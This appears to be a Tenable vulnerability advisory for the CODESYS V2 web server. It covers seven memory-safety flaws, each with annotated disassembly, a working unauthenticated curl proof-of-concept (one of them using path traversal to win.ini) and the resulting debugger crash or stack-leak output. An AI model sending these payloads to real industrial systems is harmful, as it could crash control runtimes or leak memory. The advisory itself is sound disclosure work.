CODESYS V2 Web Server Multiple Vulnerabilities
CriticalSynopsis
1) Buffer Overflow
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
A buffer overflow condition exists when copying data from a 0x100-byte stack-based buffer to a heap-based communication buffer. The copy size is controlled by the attacker:
.text:00404EE8 loc_404EE8: ; CODE XREF: FillPlcRequest+426↑j .text:00404EE8 mov edx, sz_array_indx .text:00404EEE cmp ty_array[edx*4], 8 .text:00404EF6 jnz short loc_404F1C .text:00404EF8 ty = 8 .text:00404EF8 mov eax, sz_array_indx .text:00404EFD mov ecx, sz_array[eax*4] .text:00404F04 push ecx ; attacker-controlled copy size .text:00404F05 lea edx, [ebp+sbuf100] ; 0x100-byte stack buffer .text:00404F0B push edx ; buffer over-read .text:00404F0C mov eax, pbCommBufCur ; 0x3fff-byte heap buffer .text:00404F11 push eax ; buffer over-write .text:00404F12 call _memcpy
An unauthenticated remote attacker can exploit this vulnerability with the following CURL command:
curl -d '|1|6|0|co|<copy_size>|8|v0x1|<data>|' http://<codesys_v2_web_server>:8080/
When handling this message, the CODESYS V2 web server fills a 0x100-byte stack-based buffer with <data>, limiting the buffer to have up to 0x100 bytes of <data>. The server then copies <copy_size> bytes from the stack-based buffer to a heap-based communication buffer. By default, the communication buffer has 0x3fff (16383) bytes but is configurable via the 'buffer-size' setting in the web server configuration file (webserver_conf.xml).
A large attacker-controlled <copy_size> can cause a buffer over-read on the stack-based buffer or a buffer over-write on the heap-based communication buffer, which can crash the web server or the CODESYS Control runtime system:
curl -d '|1|6|0|co|20000|8|v0x1|AAAAAAAA|' http://<codesys_v2_web_server>:8080/ 0:004> g (1e90.1bf8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=64003100 ebx=016f0000 ecx=0184a518 edx=00100000 esi=0170afe0 edi=01840000 eip=77da1f6b esp=0014c83c ebp=0014c860 iopl=0 nv up ei ng nz na pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010287 ntdll!RtlpInsertFreeBlock+0x10b: 77da1f6b 8b10 mov edx,dword ptr [eax] ds:0023:64003100=????????
In addition, a large <copy_size> can result in information disclosure as it leaks out stack contents to be traversed over the network if the web server is configured with an external CODESYS Control runtime system via the 'target-ip-address' setting in webserver_conf.xml:
curl -d '|1|6|0|co|1000|8|v0x1|AAAAAAAA|' http://<codesys_v2_web_server>:8080/
Wireshark captured TCP stream from the web server to an external CODESYS Control runtime system:
00000000 cc cc 01 00 ef 03 00 00 00 00 00 00 00 00 00 00 ........ ........
00000010 00 00 00 00 03 00 00 00 3c 77 06 00 00 00 01 41 ........ <w.....A
00000020 41 41 41 41 41 41 41 00 00 00 00 00 00 00 00 00 AAAAAAA. ........
00000030 00 00 00 e0 c9 14 00 ec 03 00 00 d0 c5 14 00 00 ........ ........
00000040 c9 14 00 01 00 00 00 00 00 00 00 01 00 00 00 b4 ........ ........
00000050 c5 14 00 00 00 00 00 01 00 00 00 00 00 00 00 d0 ........ ........
00000060 c5 14 00 01 00 00 00 80 7b e1 ff ff ff ff ff 01 ........ {.......
00000070 00 00 00 00 00 00 00 ec 03 00 00 01 00 00 00 00 ........ ........
00000080 00 00 00 01 00 00 00 00 00 00 00 fc c5 14 00 01 ........ ........
00000090 00 00 00 80 7b e1 ff ff ff ff ff 01 00 00 00 00 ....{... ........
000000A0 00 be 02 ec 03 00 00 01 00 00 00 a4 e7 fc e8 24 ........ .......$
000000B0 c5 14 00 24 c6 14 00 9c c6 14 00 40 5c 52 75 00 ...$.... ...@\Ru.
000000C0 6e bc 9d fe ff ff ff ac c6 14 00 1e 5f f8 76 ec n....... ...._.v.
000000D0 03 00 00 d4 c8 14 00 00 00 00 00 00 00 00 00 e0 ........ ........
000000E0 c9 14 00 90 c6 14 00 3a c8 0d 59 60 de 41 00 60 .......: ..Y`.A.`
000000F0 de 41 00 00 e0 25 00 1e 5f f8 76 ec 03 00 00 00 .A...%.. _.v.....
00000100 c9 14 00 e0 91 64 00 00 2e 62 00 f8 5f 63 00 bc .....d.. .b.._c..
00000110 c6 14 00 4e c8 0d 59 60 de 41 00 60 de 41 00 00 ...N..Y` .A.`.A..
00000120 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 .......0 ........
00000130 00 00 00 70 cb 14 00 c4 49 40 00 38 f6 42 00 06 ...p.... [email protected]..
00000140 00 00 00 bc f2 42 00 c8 49 46 00 04 00 00 00 00 .....B.. IF......
00000150 00 00 00 80 7b f8 76 4e 36 e2 2f fe ff ff ff ec ....{.vN 6./.....
00000160 c9 14 00 41 0e 41 00 ec 03 00 00 d4 c8 14 00 00 ...A.A.. ........
00000170 00 00 00 00 00 00 00 e0 c9 14 00 60 ff 14 00 80 ........ ...`....
00000180 7b f8 76 4e 36 e2 2f fe ff ff ff 18 ca 14 00 41 {.vN6./. .......A
00000190 0e 41 00 ec 03 00 00 00 c9 14 00 00 00 00 00 00 .A...... ........
000001A0 00 00 00 0c ca 14 00 00 00 00 00 00 00 00 00 00 ........ ........
000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000001C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000001D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000001F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000340 00 00 00 00 00 00 00 00 00 00 00 7f de d9 77 24 ........ ......w$
00000350 a7 90 85 00 00 94 01 30 04 00 00 d0 ca 14 00 df .......0 ........
00000360 07 00 d8 00 00 00 00 df 07 00 d8 3a 0e df 77 83 ........ ...:..w.
00000370 99 51 75 ec 03 00 00 dc 02 00 00 00 00 00 00 00 .Qu..... ........
00000380 00 00 00 08 c9 14 00 17 20 01 00 f8 c8 14 00 10 ........ .......
00000390 00 00 00 00 00 00 00 00 00 00 00 e4 e8 fc e8 10 ........ ........
000003A0 98 51 75 e0 91 64 00 ec 03 00 00 c0 c9 14 00 01 .Qu..d.. ........
000003B0 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 18 ....... ........
000003C0 00 00 00 00 00 00 00 dc 02 00 00 10 98 51 75 e8 ........ .....Qu.
000003D0 78 62 00 00 00 00 00 dc 02 00 00 08 c9 14 00 00 xb...... ........
000003E0 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 e8 ... .... ........
000003F0 c8 14 00 dc 02 00 00 60 ff 14 00 40 5c 52 75 90 .......` ...@\Ru.
00000400 68 bc 9d fe ff ff ff h......
00000000 cc cc 01 00 02 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000010 00 00 00 00 07 00 00 00 47 00 ........ G.
00000407 66 66 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ff...... ........
00000417 00 00 00 00 04 00 00 00 ........
0000001A 66 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff...... ........
0000002A 00 00 00 00 04 00 00 00 ........
2) Heap-based Buffer Over-read
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A heap-based buffer over-read/over-write condition exists when the web server performs an in-place XOR-based encoding of user-supplied data. The amount of data to encode is controlled by the attacker and can be larger than the actual size of the data:
.text:00409CB8 xor_encode_loop: ; CODE XREF: XorDataInPlace+AE↓j .text:00409CB8 mov ecx, [ebp+i] .text:00409CBB add ecx, 1 .text:00409CBE mov [ebp+i], ecx .text:00409CC1 .text:00409CC1 loc_409CC1: ; CODE XREF: XorDataInPlace+4F↑j .text:00409CC1 mov edx, [ebp+i] .text:00409CC4 cmp edx, [ebp+arg_len] ; attacker-controlled .text:00409CC4 ; encode length .text:00409CC7 jge short loc_409D17 .text:00409CC9 mov al, [ebp+var_C] .text:00409CCC mov [ebp+var_10], al .text:00409CCF mov ecx, [ebp+arg_pbInOutData] .text:00409CD2 add ecx, [ebp+i] .text:00409CD5 mov dl, [ecx] ; heap buffer over-read .text:00409CD7 mov [ebp+var_C], dl .text:00409CDA mov eax, [ebp+indx] .text:00409CDD add eax, 1 ; use next indx in the xor .text:00409CDD ; table to encode the next .text:00409CDD ; input byte .text:00409CE0 and eax, 800000FFh .text:00409CE5 jns short loc_409CEE .text:00409CE7 dec eax .text:00409CE8 or eax, 0FFFFFF00h .text:00409CED inc eax .text:00409CEE .text:00409CEE loc_409CEE: ; CODE XREF: XorDataInPlace+7E↑j .text:00409CEE mov [ebp+indx], eax .text:00409CF1 movsx ecx, [ebp+var_10] .text:00409CF5 mov edx, [ebp+arg_pbInOutData] .text:00409CF8 add edx, [ebp+i] .text:00409CFB movsx eax, byte ptr [edx] .text:00409CFE xor ecx, eax .text:00409D00 mov edx, [ebp+indx] .text:00409D03 xor eax, eax .text:00409D05 mov al, ds:xor_table[edx] .text:00409D0B xor ecx, eax ; data is encoded as: .text:00409D0B ; data[i] = data[i-1] ^ data[i] ^ .text:00409D0B ; xor_table[indx] .text:00409D0D mov edx, [ebp+arg_pbInOutData] .text:00409D10 add edx, [ebp+i] .text:00409D13 mov [edx], cl ; heap buffer over-write .text:00409D15 jmp short xor_encode_loop
An unauthenticated remote attacker can exploit this vulnerability with the following CURL command:
curl -d '|11|<filename>.wtc|<xor_encode_len>|<base64_encoded>|<starting_indx_of_the_xor_table>|' http://<codesys_v2_web_server>:8080/
When handling this message, the CODESYS v2 web server does the following:
- Base64-decode <base64_encoded> to a heap-based buffer
- Encode <xor_encode_len> bytes of the base64-decoded data using an XOR-based algorithm
- Write the XOR-encoded data to <webroot>/<filename>.wtc
If <xor_encode_len> is larger than the size of the base64-decoded data, a heap-based buffer over-write can cause heap corruption, likely crashing the web server or the CODESYS Control runtime system:
curl -d '|11|file1.wtc|4096|QUFBQUFBQUE=|0|' http://<codesys_v2_web_server>:8080/ 0:001> g memory check error at 0x01940A64 = 0x2E, should be 0xFD. memory check error at 0x01940A65 = 0x4E, should be 0xFD. memory check error at 0x01940A66 = 0x1D, should be 0xFD. memory check error at 0x01940A67 = 0x26, should be 0xFD. (2570.ec4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=c1ed4d5c ebx=01940a30 ecx=54571bbf edx=01940a70 esi=01940a68 edi=01940000 eip=77d9ffb7 esp=0014c974 ebp=0014caac iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!RtlpFreeHeap+0x797: 77d9ffb7 8b00 mov eax,dword ptr [eax] ds:0023:c1ed4d5c=????????
3) Message |9 NULL Pointer Dereference
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A NULL pointer dereference can occur when the web server processes a malformed message starting with |9:
.text:0040314C mov eax, [ebp+arg_pbData] .text:0040314F movsx ecx, byte ptr [eax] .text:00403152 cmp ecx, 39h ; '9' .text:00403155 jnz loc_4031F3 .text:0040315B |9 .text:0040315B mov edx, [ebp+arg_pbData] .text:0040315E add edx, 2 .text:00403161 mov [ebp+var_50], edx .text:00403164 mov [ebp+var_4C], 0 .text:0040316B mov eax, [ebp+arg_pbData] .text:0040316E add eax, 2 .text:00403171 mov [ebp+arg_pbData], eax .text:00403174 push 7Ch ; '|' ; int .text:00403176 mov ecx, [ebp+arg_pbData] .text:00403179 push ecx ; char * .text:0040317A call _strchr .text:0040317F add esp, 8 .text:00403182 mov [ebp+var_48], eax ; returned pointer not .text:00403182 ; checked for NULL .text:00403185 mov edx, [ebp+var_48] .text:00403188 mov byte ptr [edx], 0 ; NULL ptr write
An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:
curl -d '|9|0000' http://<codesys_v2_web_server>:8080/ (1314.1164): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe eax=00000000 ebx=0021f000 ecx=00000000 edx=00000000 esi=0041de60 edi=0041de60 eip=00403188 esp=0014c698 ebp=0014cb70 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 webserver+0x3188: 00403188 c60200 mov byte ptr [edx],0 ds:0023:00000000=??
4) Message |10 NULL Pointer Dereference
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A NULL pointer dereference can occur when the web server processes a malformed message starting with |10:
.text:0040335B mov eax, [ebp+arg_pbData] .text:0040335E movsx ecx, byte ptr [eax] .text:00403361 cmp ecx, 31h ; '1' .text:00403364 jnz loc_403415 .text:0040336A mov edx, [ebp+arg_pbData] .text:0040336D movsx eax, byte ptr [edx+1] .text:00403371 cmp eax, 30h ; '0' .text:00403374 jnz loc_403415 .text:0040337A |10 .text:0040337A mov ecx, [ebp+arg_pbData] .text:0040337D add ecx, 3 .text:00403380 mov [ebp+var_64], ecx .text:00403383 mov [ebp+var_60], 0 .text:0040338A mov edx, [ebp+arg_pbData] .text:0040338D add edx, 3 .text:00403390 mov [ebp+arg_pbData], edx .text:00403393 push 7Ch ; '|' .text:00403395 mov eax, [ebp+arg_pbData] .text:00403398 push eax .text:00403399 call _strchr .text:0040339E add esp, 8 .text:004033A1 mov [ebp+var_5C], eax ; returned pointer not .text:004033A1 ; checked for NULL .text:004033A4 mov ecx, [ebp+var_5C] .text:004033A7 mov byte ptr [ecx], 0 ; NULL ptr write
An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:
curl -d '|10|0' http://<codesys_v2_web_server>:8080/ (ef4.e58): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe eax=00000000 ebx=002f9000 ecx=00000000 edx=00520a60 esi=0041de60 edi=0041de60 eip=004033a7 esp=0014c698 ebp=0014cb70 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 webserver+0x33a7: 004033a7 c60100 mov byte ptr [ecx],0 ds:0023:00000000=??
5) Message |b or |e NULL Pointer Dereference
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A NULL pointer dereference can occur when the web server processes a malformed message starting with |b or |e:
.text:00403A7D mov eax, [ebp+arg_pbData] .text:00403A80 movsx ecx, byte ptr [eax] .text:00403A83 cmp ecx, 62h ; 'b' .text:00403A86 jz short loc_403A97 .text:00403A88 mov edx, [ebp+arg_pbData] .text:00403A8B movsx eax, byte ptr [edx] .text:00403A8E cmp eax, 65h ; 'e' .text:00403A91 jnz loc_403E4B .text:00403A97 |b or |e [...] .text:00403C88 push 7Ch ; '|' .text:00403C8A mov eax, [ebp+arg_pbData] .text:00403C8D push eax .text:00403C8E call _strchr .text:00403C93 add esp, 8 .text:00403C96 mov [ebp+var_84], eax ; returned pointer not .text:00403C96 ; checked for NULL .text:00403C9C mov ecx, [ebp+var_84] .text:00403CA2 mov byte ptr [ecx], 0 ; NULL ptr write
An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:
curl -d '|b|11|22|33|44|55' http://<codesys_v2_web_server>:8080/ (1ccc.6b8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe eax=00000000 ebx=003b4000 ecx=00000000 edx=00a1a49c esi=0041de60 edi=0041de60 eip=00403ca2 esp=0014c698 ebp=0014cb70 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 webserver+0x3ca2: 00403ca2 c60100 mov byte ptr [ecx],0 ds:0023:00000000=??
6) Message Parsing State 4 NULL Pointer Dereference
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A NULL pointer dereference can occur when the web server processes a malformed message in parsing state 4:
.text:00402D75 mov eax, [ebp+psHexNum] ; NULL ptr if the string in .text:00402D75 ; the first argument of the .text:00402D75 ; function does not start .text:00402D75 ; with character v, w or y .text:00402D78 add eax, 1 .text:00402D7B mov [ebp+psHexNum], eax .text:00402D7E mov ecx, [ebp+psHexNum] .text:00402D81 movsx edx, byte ptr [ecx-1] ; NULL ptr read
An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:
curl -d '|0|5|0|co|1000|8|a0x1|' http://<codesys_v2_web_server>:8080/ (2640.259c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe eax=00000001 ebx=003ac000 ecx=00000001 edx=00000001 esi=0041de60 edi=0041de60 eip=00402d81 esp=0014c208 ebp=0014c234 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 webserver+0x2d81: 00402d81 0fbe51ff movsx edx,byte ptr [ecx-1] ds:0023:00000000=??
7) Message |6 Invalid Memory Access DoS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A memory read access violation can occur when the web server processes a message starting with |6:
.text:00407637 push 3Bh ; ';' .text:00407639 mov ecx, [ebp+arg_psLine] .text:0040763C push ecx .text:0040763D call _strchr .text:00407642 add esp, 8 .text:00407645 add eax, 1 ; returned pointer not .text:00407645 ; checked for NULL .text:00407648 mov [ebp+psSemiColon], eax .text:0040764B mov edx, [ebp+psLine] .text:0040764E push edx .text:0040764F call _atol .text:00407654 add esp, 4 .text:00407657 mov [ebp+var_4], eax .text:0040765A mov eax, [ebp+psSemiColon] ; NULL + 1 .text:0040765A ; read access violation ! .text:0040765D push eax .text:0040765E call _atol
The vulnerability is triggered when processing unexpected file contents as part of message handling. An unauthenticated remote attacker can leverage a path traversal in the file extension field of the message to force the server to process the contents of an arbitrary file on the local file system. This can crash the web server or the CODESYS Control runtime system:
curl -d '|6|a|ext\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini|3|4|5|6|' http://<codesys_v2_web_server>:8080/ (1eec.20e8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe eax=00000000 ebx=003f1000 ecx=00431a5a edx=00000001 esi=0041de60 edi=0041de60 eip=0041bfdb esp=0014cb48 ebp=0014cb5c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 webserver+0x1bfdb: 0041bfdb 8a02 mov al,byte ptr [edx] ds:0023:00000001=??
Alternatively, the attacker can upload a .wtc file and force the web server to process the file contents:
curl -d $'|3|file0.wtc|file_content\n|' http://<codesys_v2_web_server>:8080/ curl -d '|6|file|wtc|3|4|5|6|' http://<codesys_v2_web_server>:8080/ (1ee0.1828): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe eax=00000000 ebx=00224000 ecx=00431a5a edx=00000001 esi=0041de60 edi=0041de60 eip=0041bfdb esp=0014cb48 ebp=0014cb5c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 webserver+0x1bfdb: 0041bfdb 8a02 mov al,byte ptr [edx] ds:0023:00000001=??
Solution
Additional References
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Risk Information
Tenable Research
9.8 / 8.8
All variants of the CODESYS runtime system prior version V1.1.9.22 are affected
Critical